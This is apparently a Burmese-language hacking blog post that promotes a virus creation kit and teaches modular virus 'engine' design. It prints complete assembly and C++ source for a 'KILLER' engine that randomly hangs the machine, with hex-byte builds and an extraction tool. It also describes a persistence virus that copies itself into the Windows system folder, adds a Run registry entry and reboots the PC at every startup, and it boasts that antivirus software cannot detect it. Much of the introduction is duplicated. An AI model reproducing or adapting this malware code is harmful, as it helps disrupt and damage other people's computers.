ဒါလည္း Virus ဖန္တီးတဲ႔ Tool တစ္ခုျဖစ္ပါတယ္။ အလြန္ Professional က်တဲ႔ Virus ေတြကို ဖန္တီးႏိုင္တဲ႔ Tool တစ္ခုျဖစ္ပါတယ္...။ ဒါအျပင္ မေကာင္းတဲ႔ hacker မ်ားတြက္လည္း အလြန္ အက်ိဳးသက္ေရာက္မႈ ရွိေစတဲ႔ Virus Creator တစ္ခုပါ။
Next Generation Virus Creation Kit 0.45 Beta
( Educational Purposes Only)
VIRUS ENGINES
က်ေနာ္ post ေတြမတင္ျဖစ္တာ နဲနဲေတာ့ၾကာေနပါျပီ... လာလည္ၾကတဲ႔ လာအားေပးတဲ႔သူေတြကို အားနာလို႔ ေန႔တိုင္း post တစ္ခုေလာက္ တင္ျဖစ္ေအာင္ ၾကိဳးစားမယ္ဆိုတဲ႔ စိတ္ကူးရွိေပမယ့္လည္း မတင္ျဖစ္ခဲ႔ပါဘူး...။
အခုတစ္ေလာ hacking ပိုင္းေတြပဲ ေရးျဖစ္ေနျပီး virus ေရးသားနည္းေတြနဲ႔ ပတ္သက္တာကို မတင္ျဖစ္တာ ၾကာပါျပီ... ဒါေၾကာင့္ Virus ေရးသားနည္းကုိ ေလ့လာသူမ်ားအတြက္ အဆင္ေျပေစဖို႔ ဒီ post ကို တင္ေပးလုိက္ပါတယ္။
ENGINES
Engines ဆိုတာကေတာ့ binary နဲ႔ source ေတြကို ကိုယ္စားျပဳတဲ႔ လြတ္လပ္တဲ႔ viurs ေရးသားနည္း တစ္ခုျဖစ္ပါတယ္။
မိတ္ဆက္
Virus Engine ေတြဟာ C/C++ class ( object ) ေတြနဲ႔ အလြန္ပင္ဆင္တူၾကျပီး၊ တူညီတဲ႔ ဂုဏ္သတၱိေတြလည္း အမ်ားၾကီးရွိၾကပါတယ္။ ဒီဟာႏွစ္ခုလံုးဟာ modularity ကို တိုက္ရိုက္သြားပါတယ္။ တစ္ခုပဲ ကြာျခားမႈရွိတာပါတယ္... အဲဒါကေတာ့ Virus Engine က တိုက္ရိုက္ အေကာင္အထည္ေဖာ္ႏိုင္ျပီး C++ class ကေတာ့ ၾကားခံေပါင္းကူးေပးတဲ႔စနစ္က မ်ားျပားလွပါတယ္။
OOP (Object Oriented Programming ) ကို မိတ္ဆက္ေပးခဲ႔ျပီးသည္ကစလို႔ ယေန႔ဆိုရင္ Virus Engines ဟာ ႏွစ္ေပါင္းမ်ားစြာၾကာခဲ႔ျပီျဖစ္တဲ႔ Programs ေတြကဲ႔သို႔ တူညီတဲ႔ အဆင့္ကို ေရာက္ရွိလာပါျပီ။ ျပီးေတာ့ ယခုအခ်ိန္ဟာ ေျပာင္းလဲဖို႔အခ်ိန္လည္း ျဖစ္ေနပါျပီ။
ဒီ post ရဲ႕ လိုရင္းကေတာ့ Virus Engine ရဲ႕ အဆင္ေျပျပီး အသံုး၀င္တဲ႔ လကၡဏာရပ္ေတြကို ေဖာ္ျပေပးသြားမွာ ျဖစ္ပါတယ္။
Virus ေရးသားျခင္းမွာ လြတ္လပ္တဲ႔ေရးသားနည္းအစိတ္အပိုင္း(modules) မ်ားကို နားလည္ျပီးမွသာလွ်င္ ဒီထဲမွာပါတဲ႔ အေတြးအေခၚပိုင္းကို နားလည္နိုင္မွာျဖစ္ပါတယ္။ဒါ့အျပင္ ဒီpostထဲမွာ LDE32, KME's, ETG, CMIX, DSCRIPT, EXPO, RPME, CODEGEN, PRCG, MACHO နဲ႔ MISTFALL တို႔ရဲ႕ property အားလံုးနီးပါးကို ဒီpostတစ္ခုတည္းနဲ႔ ေဖာ္ျပေပးျပီးသား ျဖစ္သြားမွာ ျဖစ္ပါတယ္။ဒါေတာင္မွ အေရးၾကီးတဲ႔ စံသတ္မွတ္မႈေတြ အားလံုးကို ေဖာ္ျပထားတာမဟုတ္ပဲ စံသတ္မွတ္ဖို႔အတြက္ အနည္းငယ္ကိုသာ ေဖာ္ျပဖို႔ ၾကိဳးစားထားတာ ျဖစ္ပါတယ္။ ဒီေနရာမွာ စံသတ္မွတ္မႈဆိုတာ Engine ရဲ႕ ၾကားခံေပါင္းကူးစနစ္အပို္င္းမွာ လံုး၀နီးပါး သက္ေရာက္လႊမ္းမိုးမႈေတြကို ဆိုလိုတာျဖစ္ျပီး က်န္တဲ႔အပိုင္းေတြက အမ်ားအားျဖင့္ေတာ့ တူညီေနမွာ ျဖစ္ပါတယ္။ ေသခ်ာတာကေတာ့ အလုပ္လုပ္တာခ်င္း တူညီမႈရွိမွာမဟုတ္ပါဘူး။
Code
PUBLIC-functions
အထက္မွာေဖာ္ျပခဲ႔တဲ႔ အဂၤါရပ္မ်ား အားလံုးကိုအသံုးျပဳျခင္းအားျဖင့္ engine code ဟာ OS ၊ ring0/3 နဲ႔ engine တည္ရွိရာ offset မွ လြတ္ေျမာက္လာႏိုင္ပါလိမ့္မယ္။ code ကဲ႔သို႔ ေပါင္းစပ္ႏိုင္ပါလိမ့္မယ္...ဆိုလိုတာကေတာ့ ဘယ္ညႊန္ၾကားခ်က္မ်ားကိုမဆို အလြယ္တကူ စိစစ္ႏိုင္ျခင္း၊ ဖယ္ရွားႏိုင္ျခင္း နဲ႔/သို႔ အစားထိုးလဲလွယ္နိုင္ျခင္းမ်ား ျပဳလုပ္ႏိုင္ပါတယ္။ ဒီလိုမ်ား engineမ်ားရဲ႕ Code (သို႔) sourceမ်ားကို အျခား ဘယ္engineမ်ားမွာမဆို (သို႔) viruseမ်ား၊ virus constructorမ်ား (သို႔) generatorမ်ား (သို႔) virus pluginမ်ား ထဲသို႔ေျပာင္းထည့္ျခင္းမ်ား အားျဖင့္ လြယ္ကူစြာအသံုးျပဳႏိုင္ပါတယ္။
ဒါ့အျပင္ asm- ၊ cpp- code မ်ားနဲ႔ ခ်ိတ္ဆက္ထားတဲ႔ လုပ္ငန္းတာ၀န္မ်ားကိုလည္း .obj fileမ်ား အသံုးမျပဳပဲ ေျဖရွင္းႏိုင္ပါတယ္။
ဥပမာ
Engine : KILLER ။ ရည္မွန္းခ်က္ပန္းတိုင္ : 1/1000 ရဲ႕ ျဖစ္ႏိုင္ေျခနဲ႔ ဟန္႔တားထစ္ေနေစဖို႔ ။
ASM include file ျဖစ္ေပၚေစပါတယ္...:
ေအာက္မွာေဖာ္ျပထားတာကလည္း အတူတူပါပဲ...ဒါေပမယ့္ C/C++ ထဲမွာ :
C/C++ header file:
အသံုးျပဳပံု ဥပမာ ၊ ASM ထဲတြင္...
အသံုးျပဳပံု ဥပမာ၊ C/C++ ထဲတြင္...
engine ကို compileျပဳလုပ္ရန္ ဥပမာ program
ယခင္ file မွ binary(DB,DB,...)ထဲတြင္ rip ျဖစ္ဖို႔ ဥပမာ program
အခု example.asm ကိုၾကည့္ ၾကည့္ပါ ၄င္းဟာ ယခုေခတ္အသံုးျပဳေနတဲ႔ virus ေရွ႕ေျပးပံုစံတစ္ခုျဖစ္ပါတယ္။ အဲဒီfile မွာ engine အသံုးျပဳပါတယ္။ engineဟာ external randomer အသံုးျပီး randomer က virus ရဲ႕ main body ကို အသံုးျပဳဖို႔ျပင္ဆင္ျခင္းမွာ data ကိုဖ်တ္ထားတဲ႔ randseed ကိုအသံုးျပဳပါတယ္။ အက်ိဳးရလဒ္ကေတာ့ engine မ်ားဟာ တူညီတဲ႔ rnd() (သို႔) file io functionမ်ား (သို႔) main object နဲ႔တူညီတဲ႔ ၄င္းတို႔ရဲ႕ common structure မွတဆင့္ နည္းလမ္းတစ္ခုျဖင့္ အျခားအသီးသီးကို ေခၚႏိုင္ပါတယ္။
(Educational Purposes Only)
အခုတစ္ေလာ hacking ပိုင္းေတြပဲ ေရးျဖစ္ေနျပီး virus ေရးသားနည္းေတြနဲ႔ ပတ္သက္တာကို မတင္ျဖစ္တာ ၾကာပါျပီ... ဒါေၾကာင့္ Virus ေရးသားနည္းကုိ ေလ့လာသူမ်ားအတြက္ အဆင္ေျပေစဖို႔ ဒီ post ကို တင္ေပးလုိက္ပါတယ္။
ENGINES
Engines ဆိုတာကေတာ့ binary နဲ႔ source ေတြကို ကိုယ္စားျပဳတဲ႔ လြတ္လပ္တဲ႔ viurs ေရးသားနည္း တစ္ခုျဖစ္ပါတယ္။
မိတ္ဆက္
Virus Engine ေတြဟာ C/C++ class ( object ) ေတြနဲ႔ အလြန္ပင္ဆင္တူၾကျပီး၊ တူညီတဲ႔ ဂုဏ္သတၱိေတြလည္း အမ်ားၾကီးရွိၾကပါတယ္။ ဒီဟာႏွစ္ခုလံုးဟာ modularity ကို တိုက္ရိုက္သြားပါတယ္။ တစ္ခုပဲ ကြာျခားမႈရွိတာပါတယ္... အဲဒါကေတာ့ Virus Engine က တိုက္ရိုက္ အေကာင္အထည္ေဖာ္ႏိုင္ျပီး C++ class ကေတာ့ ၾကားခံေပါင္းကူးေပးတဲ႔စနစ္က မ်ားျပားလွပါတယ္။
OOP (Object Oriented Programming ) ကို မိတ္ဆက္ေပးခဲ႔ျပီးသည္ကစလို႔ ယေန႔ဆိုရင္ Virus Engines ဟာ ႏွစ္ေပါင္းမ်ားစြာၾကာခဲ႔ျပီျဖစ္တဲ႔ Programs ေတြကဲ႔သို႔ တူညီတဲ႔ အဆင့္ကို ေရာက္ရွိလာပါျပီ။ ျပီးေတာ့ ယခုအခ်ိန္ဟာ ေျပာင္းလဲဖို႔အခ်ိန္လည္း ျဖစ္ေနပါျပီ။
ဒီ post ရဲ႕ လိုရင္းကေတာ့ Virus Engine ရဲ႕ အဆင္ေျပျပီး အသံုး၀င္တဲ႔ လကၡဏာရပ္ေတြကို ေဖာ္ျပေပးသြားမွာ ျဖစ္ပါတယ္။
Virus ေရးသားျခင္းမွာ လြတ္လပ္တဲ႔ေရးသားနည္းအစိတ္အပိုင္း(modules) မ်ားကို နားလည္ျပီးမွသာလွ်င္ ဒီထဲမွာပါတဲ႔ အေတြးအေခၚပိုင္းကို နားလည္နိုင္မွာျဖစ္ပါတယ္။ဒါ့အျပင္ ဒီpostထဲမွာ LDE32, KME's, ETG, CMIX, DSCRIPT, EXPO, RPME, CODEGEN, PRCG, MACHO နဲ႔ MISTFALL တို႔ရဲ႕ property အားလံုးနီးပါးကို ဒီpostတစ္ခုတည္းနဲ႔ ေဖာ္ျပေပးျပီးသား ျဖစ္သြားမွာ ျဖစ္ပါတယ္။ဒါေတာင္မွ အေရးၾကီးတဲ႔ စံသတ္မွတ္မႈေတြ အားလံုးကို ေဖာ္ျပထားတာမဟုတ္ပဲ စံသတ္မွတ္ဖို႔အတြက္ အနည္းငယ္ကိုသာ ေဖာ္ျပဖို႔ ၾကိဳးစားထားတာ ျဖစ္ပါတယ္။ ဒီေနရာမွာ စံသတ္မွတ္မႈဆိုတာ Engine ရဲ႕ ၾကားခံေပါင္းကူးစနစ္အပို္င္းမွာ လံုး၀နီးပါး သက္ေရာက္လႊမ္းမိုးမႈေတြကို ဆိုလိုတာျဖစ္ျပီး က်န္တဲ႔အပိုင္းေတြက အမ်ားအားျဖင့္ေတာ့ တူညီေနမွာ ျဖစ္ပါတယ္။ ေသခ်ာတာကေတာ့ အလုပ္လုပ္တာခ်င္း တူညီမႈရွိမွာမဟုတ္ပါဘူး။
Code
- Engine မွာ executable code ေတြသာလွ်င္ ပါ၀င္ရပါမယ္။ ဆိုလိုတာကေတာ့ evident formေတြမွာ data ေတြမပါ၀င္ရပါဘူး။ ၄င္းဟာ code generation ထဲမွာ data ရဲ႕ means အားျဖင့္ စြမ္းေဆာင္ႏိုင္ရပါမယ္။
- Engine မွာ absolute offset မ်ား မပါ၀င္ရပါဘူး။ ၄င္းဟာ stack နဲ႔ ဒီ structureသို႔ pointer ေျပာင္းေရႊ႕ လိုက္တဲ႔ ေပၚမွာ data structure ဖန္တီးျခင္းရဲ႕ means အားျဖင့္ စြမ္းေဆာင္ႏိုင္ရပါမယ္။
- Engine မွာ external data structureမ်ား ကို တိုက္ရုိက္အသံုးမျပဳရပါဘူး။ external subroutineမ်ားကို တိုက္ရုိက္ CALL မလုပ္ရပါဘူး။ ၄င္းအစား data နဲ႔ suboroutineမ်ားသို႔ pointerမ်ားကို argumentမ်ားကဲ့သို႔ engine ဆီကို ျဖတ္ေက်ာ္လာေစရပါမယ္။
- (ေရြးခ်ယ္မႈတစ္ခုအေနနဲ႔)Engine ကုိ system callမ်ား မျပဳလုပ္ေစရပါဘူး။ အဲဒီအစား own subroutineမ်ားသို႔ pointer မ်ားဟာ engine ကိုျဖတ္ေက်ာ္ရပါမယ္။ ျပီးရင္ engine က ၄င္းတို႔ကို ျဖတ္ေက်ာ္ျပီး system subroutine မ်ားကို CALL လုပ္ရပါမယ္။
PUBLIC-functions
- Parameterမ်ားဟာ stack ေပၚမွာ ျဖတ္ေက်ာ္ေစရပါမယ္။ ( registerမ်ားထဲမွာ မဟုတ္ပါ။)
- Function result ဟာ( လိုအပ္လွ်င္) EAX ထဲမွာ return ျဖစ္ရပါမယ္။
- registerမ်ားအားလံုးကို ထိန္းသိမ္းထားရပါမယ္( EAX မွလြဲ၍)။
- (ေရြးခ်ယ္မႈတစ္ခုအေနနဲ႔) function exit ေပၚမွာ DF flagဟာ 0 (သံုည) ျဖစ္ေစရပါမယ္။ (CLD)
- အကယ္၍ Sourceမ်ား ရွိခဲ႔ရင္ Variables, arguments, constants, internal subroutines နဲ႔ အျခား name နဲ႔ lable မ်ားဟာ unique ျဖစ္ရပါမယ္။ user ရဲ႕ sourceမ်ား (သို႔) အျခား engineမ်ားထဲမွ label မ်ားနဲ႔ တထပ္တည္း မျဖစ္ေစရပါဘူး။
- အကယ္၍ အခ်ိဳ႕ေသာ data structureမ်ား နဲ႔/သို႔ exit codes , engine call ထဲမွာ အသံုးျပဳျခင္း ရွိရင္ ၄င္းတို႔အားလံုးကို သီးျခား .INC file ထဲမွာ ေဖာ္ျပရပါမယ္။
- Engineဟာ documentionအခ်ိဳ႕ အားျဖင့္ ခ်ိတ္ဆက္ရပါမယ္။ ေအာက္မွာျပထားတဲ႔ဟာေတြလိုပဲ ေဖာ္ျပသင့္ပါတယ္...
- Engine ၊ ၄င္းရဲ႕ algorithm ၊ ၄င္းရဲ႕ အဓိကရည္ရြယ္ခ်က္ ။ ဆိုလိုတာကေတာ့ ၄င္းဟာ ဘာအတြက္ရည္ရြယ္ျပီး ဘယ္လိုေတြ အလုပ္လုပ္သလဲ၊
- PUBLIC-function အသီးသီးရဲ႕ ေဖာ္ျပခ်က္ နဲ႔ ၄င္းရဲ႕ parameter မ်ား၊
- (ေရြးခ်ယ္မႈအားျဖင့္) bug မ်ား နဲ႔ အဂၤါရပ္မ်ား၊
- (ေရြးခ်ယ္မႈအားျဖင့္) engine ကို ဘယ္မွာစမ္းသပ္ျပီးျပီလဲ၊ ၄င္းက ဘယ္မွအလုပ္လုပ္လဲ ၊ မလုပ္ဘူးလဲ။
- Engine မွာ PUBLIC-function တစ္ခုတည္း ရွိပါတယ္။ engine ရဲ႕ code အစပုိင္းမွာ( အလယ္မွာျဖစ္ခ်င္ရင္ အစမွာ JMP ကိုသံုး။) ျဖစ္ျပီး ၄င္းရဲ႕ main function မွာ CDECL calling convection (PUSH*n, CALL, RETN, ADD ESP, n*4 ) ရွိပါတယ္။
- Engine ဟာ on-stack data variableမ်ားကိုသာ အသံုးျပဳပါတယ္။ (argument မ်ားနဲ႔ variables space)
- Engine ဟာ multithread enviroument ထဲမွာ အလုပ္လုပ္ပါတယ္။ (ဆိုလိုတာကေတာ့ external data structure မ်ားသို႔ pointer မ်ားဟာ engine ဆီကို ျဖတ္ေက်ာ္လာတဲ႔အခါ engine ရဲ႕ တိုးပြားလာတဲ႔ျဖစ္စဥ္ေတြဟာ အဲဒီ့ data structureမ်ားနဲ႔ မွန္မွန္ကန္ကန္ အလုပ္လုပ္ပါလိမ့္မယ္။)
- Engine ဟာ .386 realmode opcodeမ်ားကို သာလွ်င္အသံုးျပဳပါတယ္။ (ဆိုလိုတာက အားလံုးတစ္ပန္းသာတယ္ (သို႔) .486+ opcodeမ်ား ၊ bswap (သို႔) cmpxchg ကဲ႔သို႔ ပ လပ္ႏိုင္တယ္။)
အထက္မွာေဖာ္ျပခဲ႔တဲ႔ အဂၤါရပ္မ်ား အားလံုးကိုအသံုးျပဳျခင္းအားျဖင့္ engine code ဟာ OS ၊ ring0/3 နဲ႔ engine တည္ရွိရာ offset မွ လြတ္ေျမာက္လာႏိုင္ပါလိမ့္မယ္။ code ကဲ႔သို႔ ေပါင္းစပ္ႏိုင္ပါလိမ့္မယ္...ဆိုလိုတာကေတာ့ ဘယ္ညႊန္ၾကားခ်က္မ်ားကိုမဆို အလြယ္တကူ စိစစ္ႏိုင္ျခင္း၊ ဖယ္ရွားႏိုင္ျခင္း နဲ႔/သို႔ အစားထိုးလဲလွယ္နိုင္ျခင္းမ်ား ျပဳလုပ္ႏိုင္ပါတယ္။ ဒီလိုမ်ား engineမ်ားရဲ႕ Code (သို႔) sourceမ်ားကို အျခား ဘယ္engineမ်ားမွာမဆို (သို႔) viruseမ်ား၊ virus constructorမ်ား (သို႔) generatorမ်ား (သို႔) virus pluginမ်ား ထဲသို႔ေျပာင္းထည့္ျခင္းမ်ား အားျဖင့္ လြယ္ကူစြာအသံုးျပဳႏိုင္ပါတယ္။
ဒါ့အျပင္ asm- ၊ cpp- code မ်ားနဲ႔ ခ်ိတ္ဆက္ထားတဲ႔ လုပ္ငန္းတာ၀န္မ်ားကိုလည္း .obj fileမ်ား အသံုးမျပဳပဲ ေျဖရွင္းႏိုင္ပါတယ္။
ဥပမာ
Engine : KILLER ။ ရည္မွန္းခ်က္ပန္းတိုင္ : 1/1000 ရဲ႕ ျဖစ္ႏိုင္ေျခနဲ႔ ဟန္႔တားထစ္ေနေစဖို႔ ။
----[begin KILLER.ASM]--------------------------------------------------
; KILLER engine version 1.00 FREEWARE
; action: hangup with probability of 1/1000;
; CDECL calling convention;
; 5 arguments;
; no return value, no registers modified
killer_engine proc c
arg user_param ; user-data
arg user_random ; external randomer
arg arg1
arg arg2 ; other parameters
arg arg3
pusha
cld
;;
push 1000
push user_param ; maybe ptr to some struct
call user_random ; call external subroutine
add esp, 8
;;
cmp eax, 666
je $
;;
popa
ret ; TASM produces LEAVE+RETN
endp
----[end KILLER.ASM]----------------------------------------------------
----[begin KILLER.INC]--------------------------------------------------
; GENERATED FILE. DO NOT EDIT.
; KILLER 1.00 engine
killer_engine_size equ 30
killer_engine:
db 0C8h,000h,000h,000h,060h,0FCh,068h,0E8h
db 003h,000h,000h,0FFh,075h,008h,0FFh,055h
db 00Ch,083h,0C4h,008h,03Dh,09Ah,002h,000h
db 000h,074h,0FEh,061h,0C9h,0C3h
----[end KILLER.INC]----------------------------------------------------
----[begin KILLER.CPP]--------------------------------------------------
// GENERATED FILE. DO NOT EDIT.
// KILLER 1.00 engine
#define killer_engine_size 30
BYTE killer_engine_bin[killer_engine_size] =
{
0xC8,0x00,0x00,0x00,0x60,0xFC,0x68,0xE8,
0x03,0x00,0x00,0xFF,0x75,0x08,0xFF,0x55,
0x0C,0x83,0xC4,0x08,0x3D,0x9A,0x02,0x00,
0x00,0x74,0xFE,0x61,0xC9,0xC3
};
----[end KILLER.CPP]----------------------------------------------------
----[begin KILLER.ASH]--------------------------------------------------
; KILLER 1.00 engine
KILLER_VERSION equ 0100h
----[end KILLER.ASH]----------------------------------------------------
----[begin KILLER.HPP]--------------------------------------------------
// KILLER 1.00 engine
#ifndef __KILLER_HPP__
#define __KILLER_HPP__
#define KILLER_VERSION 0x0100
typedef
void __cdecl killer_engine(
DWORD user_param, // user-parameter
DWORD __cdecl user_random(DWORD user_param, DWORD range),
DWORD arg1,
DWORD arg2,
DWORD arg3);
#endif //__KILLER_HPP__
----[end KILLER.HPP]----------------------------------------------------
----[begin EXAMPLE.ASM]-------------------------------------------------
; KILLER 1.00 usage example
include killer.ash
callW macro x
extern x:PROC
call x
endm
v_data struc
v_randseed dd ?
; ...
ends
p386
model flat
locals __
.data
dd ?
.code
start: call virus_code
push -1
callW ExitProcess
virus_code: pusha
sub esp, size v_data
mov ebp, esp
;;
callW GetTickCount
xor [ebp].v_randseed, eax ; randomize
;;
push 3
push 2 ; parameters
push 1
call 5+2 ; push pointer to randomer
jmp short my_random
push ebp ; user-param == v_data ptr
call killer_engine
add esp, 4*5
;;
add esp, size v_data
popa
retn
; DWORD __cdecl random(DWORD user_param, DWORD range)
; [esp+4] [esp+8]
my_random: mov ecx, [esp+4] ; v_data ptr
mov eax, [ecx].v_randseed
imul eax, 214013
add eax, 2531011
mov [ecx].v_randseed, eax
shr eax, 16
imul eax, [esp+8]
shr eax, 16
retn
;killer_engine:
include killer.inc
virus_size equ $-virus_code
end start
----[end EXAMPLE.ASM]---------------------------------------------------
----[begin EXAMPLE.CPP]-------------------------------------------------
#include <windows.h>
#pragma hdrstop
#include "killer.hpp"
#include "killer.cpp"
struct v_struct
{
DWORD rseed;
//...
};
DWORD __cdecl my_random(DWORD user_arg, DWORD range)
{
v_struct* v = (v_struct*) user_arg;
return range ? (v->rseed = v->rseed * 214013 + 2531011) % range : 0;
}
void main()
{
v_struct* v_data = (v_struct*) GlobalAlloc( GPTR, sizeof(v_struct) );
v_data->rseed = GetTickCount(); // randomize
void* engine_ptr = &killer_engine_bin;
(*(killer_engine*)engine_ptr)((DWORD)v_data, my_random, 1,2,3);
}
----[end EXAMPLE.CPP]---------------------------------------------------
----[begin BUILD.ASM]---------------------------------------------------
p386
model flat
locals __
.data
db 0EBh,02h,0FFh,01h ; signature
include killer.asm
db 0EBh,02h,0FFh,02h ; signature
.code
start: push -1
callW ExitProcess
end start
----[end BUILD.ASM]-----------------------------------------------------
----[begin HAXOR.CPP]---------------------------------------------------
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <io.h>
#pragma hdrstop
void main()
{
FILE*f=fopen("build.exe","rb");
int bufsize = filelength(fileno(f));
BYTE* buf = new BYTE[bufsize+1];
fread(buf, 1,bufsize, f);
fclose(f);
int id1=0, id2=0;
for (int i=0; i<bufsize; i++)
{
if (*(DWORD*)&buf[i] == 0x01FF02EB) id1=i+4; // check signature
if (*(DWORD*)&buf[i] == 0x02FF02EB) id2=i; // check signature
}
f=fopen("killer.inc","wb");
fprintf(f,"; GENERATED FILE. DO NOT EDIT.\r\n");
fprintf(f,"; KILLER 1.00 engine\r\n");
fprintf(f,"killer_size equ %i\r\n", id2-id1);
fprintf(f,"killer_engine:\r\n", id2-id1);
for (int i=0; i<id2-id1; i++)
{
if ((i%8)==0) fprintf(f,"db ");
fprintf(f,"0%02Xh", buf[id1+i]);
if (((i%8)==7)||(i==id2-id1-1)) fprintf(f,"\r\n"); else fprintf(f,",");
}
fclose(f);
f=fopen("killer.cpp","wb");
fprintf(f,"; GENERATED FILE. DO NOT EDIT.\r\n");
fprintf(f,"// KILLER 1.00 engine\r\n");
fprintf(f,"#define killer_engine_size %i\r\n",id2-id1);
fprintf(f,"BYTE killer_engine_bin[killer_engine_size] = {\r\n");
for (int i=0; i<id2-id1; i++)
{
if ((i%8)==0) fprintf(f," ");
fprintf(f,"0x%02X", buf[id1+i]);
if (i!=id2-id1-1) fprintf(f,",");
if ((i%8)==7) fprintf(f,"\r\n");
}
fprintf(f," };\r\n");
fclose(f);
}
----[end HAXOR.CPP]-----------------------------------------------------
အခု example.asm ကိုၾကည့္ ၾကည့္ပါ ၄င္းဟာ ယခုေခတ္အသံုးျပဳေနတဲ႔ virus ေရွ႕ေျပးပံုစံတစ္ခုျဖစ္ပါတယ္။ အဲဒီfile မွာ engine အသံုးျပဳပါတယ္။ engineဟာ external randomer အသံုးျပီး randomer က virus ရဲ႕ main body ကို အသံုးျပဳဖို႔ျပင္ဆင္ျခင္းမွာ data ကိုဖ်တ္ထားတဲ႔ randseed ကိုအသံုးျပဳပါတယ္။ အက်ိဳးရလဒ္ကေတာ့ engine မ်ားဟာ တူညီတဲ႔ rnd() (သို႔) file io functionမ်ား (သို႔) main object နဲ႔တူညီတဲ႔ ၄င္းတို႔ရဲ႕ common structure မွတဆင့္ နည္းလမ္းတစ္ခုျဖင့္ အျခားအသီးသီးကို ေခၚႏိုင္ပါတယ္။
(Educational Purposes Only)
computer startup လုပ္တိုင္း restart ျဖစ္ေစတဲ႔ Virus
ဒီ post မွာ ေဖာ္ျပထားတဲ႔ virus ကေတာ့ computer ကို startup လုပ္တိုင္း restart ျဖစ္ေစပါလိမ့္မယ္။ ဆိုလိုတာကေတာ့ ဒီ virus ကူးစက္ခံရတဲ႔ computer ဟာ system က boot တက္ျပီးတဲ႔ အခါတိုင္းမွာ restart ျဖစ္သြားပါလိမ့္မယ္။ computer က desktop loaded ျပီးတာနဲ႔ reboots ျဖစ္ေနမွာျဖစ္တဲ႔အတြက္ အလုပ္မျဖစ္ေတာ့ပါဘူး။ဒီ virus ကူးစက္ဖို႔အတြက္ doubleclick တစ္ခါလုပ္ဖို႔ပဲလိုက္ပါတယ္။ က်န္တဲ႔ operation အပိုင္းကိုေတာ့ သူ႔ဟာသူဆက္လုပ္သြားႏိုင္ပါတယ္။ ဒါ့အျပင္ ဒီ virus အမ်ိဳးအစားေတြဟာ anti-virus software ကေန virus တစ္ခုအျဖစ္ detect မလုပ္ႏိုင္တဲ႔ အထဲမွာပါ ပါတယ္။
ေအာက္မွာေဖာ္ျပထားတဲ႔ virus source code ေတြကို ေလ့လာၾကည့္ပါ။ C language နဲ႔ အကၽြမ္းတ၀င္ ျဖစ္ျပီး သူေတြအေနနဲ႔အလြယ္တကူပဲ နားလည္ႏိုင္ပါလိမ့္မယ္။
( မွတ္ခ်က္ - အစိမ္းေရာင္နဲ႔ ျပထားတဲ႔ comment ေတြကို ဖတ္ၾကည့္ရင္နားလည္ေလာက္ပါတယ္။)
၁။ source code ကို ဒီမွာလည္း downlaod ႏိုင္ပါတယ္။

၂။ file ကို download ျပီးသြားရင္ Sysres.C နဲ႔ ေတြ႔ရပါလိမ့္မယ္။
၃။ ဒီ source code file ကို compile လုပ္ဖို႔လိုပါတယ္။ (C program ကို ဘယ္လုိ compile လုပ္မလဲ ဆိုတဲ့ post မွာၾကည့္ပါ။ (သို႔) Dev C++ compilerကို လည္းသံုးႏိုင္ပါတယ္။)
Virus ကုိ သင့္ရဲ႕ PC တြင္ စမ္းသပ္ျခင္း ႏွင့္ ဖယ္ရွားျခင္း
compile လုပ္ျပီးျပီဆိုရင္ ဒီ Virus ကို ဘာမွေၾကာက္လန္႔ေနစရာမလိုပဲ စိတ္ခ်လက္ခ် စမ္းသပ္ႏိုင္ပါတယ္။ စမ္းသပ္ဖို႔အတြက္ Sysres.exe file ကို double click လုပ္ပါ။ ျပီးရင္ system ကို restart လုပ္လိုက္ပါ။ ဒါျပီးရင္ေတာ့ သင့္ရဲ႕ PC ဟာ boot တက္ျပီ: desktop loaded ျဖစ္ျပီးဆိုတာနဲ႔ အလိုအေလွ်ာက္ restart ျဖစ္သြားပါလိမ့္မယ္။ အဲလိုမ်ိဳး ခဏခဏ ျဖစ္ပါလိမ့္မယ္။
စမ္းသပ္လို႔ အားရျပီးဆိုရင္ေတာ့ ဒီ virus ကို ေအာက္ပါအဆင့္မ်ားအတိုင္း ဖယ္ရွားႏိုင္ပါတယ္...
၁။ Reboot ျဖစ္ျပီးတာနဲ႔ SAFE MODE ထဲကိုသြားပါ။
၂။ X:\Windows\System ( X ဆိုတာကေတာ့ C,D,E (သို႔) F ကိုဆိုလိုတာပါ။)
၃။ Sysres.exe ဆိုတဲ႔ နာမည္နဲ႔ file ကို ရွာျပီး delete လုပ္လိုက္ပါ။
၄။ ျပီးရင္ run ထဲမွာ regedit လို႔ရိုက္ျပီး registry editor ထဲမွာ
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Run
သို႔သြားပါ။ျပီးရင္ ညာဘက္က pane ထဲမွာ "sres" ဆိုတဲ႔ နာမည္နဲ႔ entry တစ္ခုကိုေတြ႔ပါလိမ့္မယ္။ အဲဒီ entry ကို delete လုပ္လိုက္ပါ။ ဒါဆိုရင္ ဒီ virus ကို ဖယ္ရွားျခင္း ေအာင္ျမင္စြာ ျပီးဆံုးသြားပါျပီ။
Virus အလုပ္လုပ္ျခင္း ေနာက္ကြယ္မွ Logic
virus ရဲ႕ လုပ္ေဆာင္ခ်က္ေတြရဲ႕ ေနာက္ကြယ္မွာရွိတဲ႔ logic(Algorithm) ကို နဲနဲေလာက္ရွင္းျပပါမယ္။ ဒါေပမယ့္ program နဲ႔ ပတ္သတ္တဲ႔ နည္းပညာအေသးစိတ္ကိုေတာ့ မရွင္းပါဘူး ။
LOGIC:
၁။ ပထမဆံုး virus က Root partation( Windows ကို install လုပ္ထားတဲ႔ partation) ကို လိုက္ရွာပါတယ္။
၂။ ေနာက္တဆင့္အေနနဲ႔ Virus က သူရဲ႕ file ေတြကို X:\Windows\System ထဲမွာ copy ကူးျပီးျပီလား( ကူးစက္ျပီးျပီလား) မကူးရေသးဘူးလား ဆိုတာကို ဆံုးျဖတ္တြက္ခ်က္ပါတယ္။
၃။ copy မလုပ္ရေသးဘူးဆိုရင္ေတာ့ X:\Windows\System ထဲမွာ သူ႔ကိုယ္သူ copy လုပ္ျပီး startup ေပၚမွာ virus file ကိုထည့္ႏိုင္ဖို႔အတြက္ registry entry တစ္ခုကိုျပဳလုပ္ပါလိမ့္မယ္။
၄။ ဒါမွမဟုတ္လို႔ X:\Windows\System ထဲမွာ virus ကိုေတြ႔မယ္ဆိုရင္ေတာ့ ၄င္းက computer ကို restart လုပ္ဖို႔ command ေပးပါလိမ့္မယ္။
ဒီ process က PC restart ျဖစ္ျပီးတဲ႔အခါတိုင္းမွာ ျဖစ္ေနပါလိမ့္မယ္။
